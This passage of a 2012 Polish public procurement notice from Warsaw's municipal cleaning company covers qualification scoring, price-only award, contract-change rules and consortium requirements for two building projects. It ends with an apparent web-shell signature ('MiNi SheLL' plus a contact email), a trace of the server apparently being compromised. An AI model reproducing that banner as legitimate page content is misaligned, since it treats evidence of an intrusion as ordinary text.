2) Zamawiający będzie dokonywał oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów określonych w sekcji III niniejszego ogłoszenia według formuły określonej w sekcji III niniejszego ogłoszenia. 
3) Z treści załączonych dokumentów i oświadczeń musi jednoznacznie wynikać, że Wykonawca spełnia wszystkie warunki udziału w postępowaniu.
4) Nie spełnienie któregokolwiek warunku spowoduje wykluczenie Wykonawcy z postępowania.
5) Ogółem w pierwszym etapie Wykonawca może uzyskać 35 punktów.
6) Do drugiego etapu (składania ofert) Zamawiający zaprosi 5 Wykonawców, którzy spełniają warunki udziału w postępowaniu.
7) Jeżeli liczba Wykonawców, którzy złożą wniosek o dopuszczenie do udziału w postępowaniu i spełniających warunki udziału w postępowaniu określone w sekcji III.3) niniejszego ogłoszenia (potwierdzone dokumentami określonymi w sekcji III.4) i III.6) niniejszego ogłoszenia będzie mniejsza niż określona w niniejszym ogłoszeniu, Zamawiający zaprosi do składania ofert wszystkich Wykonawców spełniających wymagane warunki. 
8) Jeżeli liczba Wykonawców, którzy złożą wniosek o dopuszczenie do udziału w postępowaniu i spełniających warunki udziału w postępowaniu określone w sekcji III.3) niniejszego ogłoszenia (potwierdzone dokumentami określonymi w sekcji III.4) i III.6) niniejszego ogłoszenia będzie większa niż określona w niniejszym ogłoszeniu, Zamawiający zaprosi do składania ofert 5 Wykonawców, którzy otrzymają najwyższą ilość punktów uzyskaną z rankingu.
9) W przypadku, gdy taką samą liczbę punktów otrzyma 5 i następni Wykonawcy, wówczas o kolejności Wykonawców decydować będzie łączna wartość robót wymienionych w wykazie, którego wzór stanowi załącznik do Wniosku o dopuszczenie do udziału w postępowaniu (Oświadczenie potwierdzające posiadanie wiedzy i doświadczenia zawodowego w zakresie niezbędnym do wykonania zamówienia).
10) W przypadku, gdy więcej Wykonawców otrzyma taką samą liczbę punktów oraz wykaże taką samą wartośc robót jak Wykonawca piąty w kolejności, Zamawiajacy zaprosi do składania ofert wszystkich Wykonawców, którzy uzyskają tę liczbę punktów oraz wykażą taką samą wartość robót wymienionych w wykazie.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany treści zawartej umowy w zakresie: 
a) cen określonych w ofercie Wykonawcy, tylko wówczas, gdy konieczność wprowadzenia takich zmian wynikać będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a związanych ze zmianą należności publiczno-prawnych w tym np podatku VAT lub podatku akcyzowego, mających bezpośredni wpływ na cenę,
b) osób uczestniczących w realizacji zamówienia wskazanych w załączniku do wniosku o dopuszczenie do udziału w postępowaniu, tylko wówczas, gdy konieczność wprowadzenia takich zmian wynikać będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Jednocześnie Zamawiający zastrzega, że ewentualne zmiany treści zawartej umowy w tym zakresie muszą nadal potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu postawionych w niniejszym ogłoszeniu. 
Warunkiem wprowadzenia zmian, o których mowa w pkt a i b jest pisemny wniosek Wykonawcy w tej sprawie przekazany koordynatorowi realizacji umowy ze strony Zamawiającego wskazanemu w umowie. Wniosek ten musi zawierać co najmniej:
- proponowaną treść zmian,
- wyczerpujące wyjaśnienie okoliczności, które są podstawą ich wprowadzenia wraz z udowodnieniem, że zmian tych nie można było przewidzieć w chwili zawarcia umowy,
- udowodnienie, że proponowane zmiany potwierdzają spełnienie przez Wykonawcę warunków udziału w postępowaniu postawionych w niniejszym ogłoszeniu (dla pkt  b).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia zostanie przesłana wraz z zaproszeniem do złożenia ofert Wykonawcom, którzy zakwalifikują się do dalszego etapu przetargu ograniczonego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2012 godzina 11:00, miejsce: Miejskie Przedsiębiorstwo Oczyszczania w m. st. warszawie Sp. z o.o., ul. Obozowa 43, 01-161 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Wymagany termin realizacji zamówienia:
a) Budynku Warsztatowego: 120 dni kalendarzowych od daty podpisania umowy, z zastrzeżeniem iż:
- wykonanie posadzek w części warsztatowej nastąpić ma do 90 dnia kalendarzowego od daty podpisania umowy, 
- wykonanie prac wewnętrznych w części socjalno-biurowej budynku warsztatowego nastąpić ma do 90 dnia kalendarzowego od daty podpisania umowy,
b) dla Budynku Administracyjno-Socjalnego: 135 dni kalendarzowych od daty podpisania umowy.


2. Zasady udziału w postępowaniu Wykonawców występujących wspólnie:
1) Wykonawcy ubiegający się wspólnie (konsorcja i spółki cywilne) o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
2) Pełnomocnictwo musi zawierać pełną nazwę wszystkich uczestników konsorcjum (lub imiona i nazwiska wszystkich wspólników spółki cywilnej) oraz musi być podpisane przez wszystkich wymienionych uczestników zgodnie z zasadami reprezentacji. 
3) Wykonawcy, o których mowa w ppkt 1, składają jednen wniosek o dopuszczenie do udziału w postępowaniu, przy czym: 
a) wymagane dokumenty lub oświadczenia wskazane w sekcji III.4.2) pozycja 2,3,4 niniejszego ogłoszenia o zamówieniu składa oddzielnie każdy uczestnik konsorcjum i każdy wspólnik spółki cywilnej, z zastrzeżeniem, że w przypadku spółek cywilnych zaświadczenie wskazane w sekcji III.4.2) pozycja 3 niniejszego ogłoszenia musi zostać wystawione także na spółkę, 
b) oświadczenie wskazane w sekcji III.4.2) pozycja 1 niniejszego ogłoszenia o zamówieniu) składa oddzielnie każdy uczestnik konsorcjum i każdy wspólnik spółki cywilnej, 
c) oświadczenie o spełnieniu warunków udziału w postępowaniu wskazane w sekcji III.4.1) niniejszego ogłoszenia o zamówieniu składają wspólnie wszyscy uczestnicy konsorcjum oraz wspólnicy spółki cywilnej,  
d) pozostałe dokumenty (wskazane w sekcji: III.4.1) i III.6) pozycja 7 niniejszego ogłoszenia o zamówieniu) składają wspólnie wszyscy uczestnicy konsorcjum oraz wspólnicy spółki cywilnej. W przypadku wybrania przez Zamawiającego oferty wykonawców ubiegających się wspólnie o zamówienie, Zamawiający przed zawarciem umowy w sprawie zamówienia publicznego zażąda umowę regulująca współpracę tych wykonawców.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com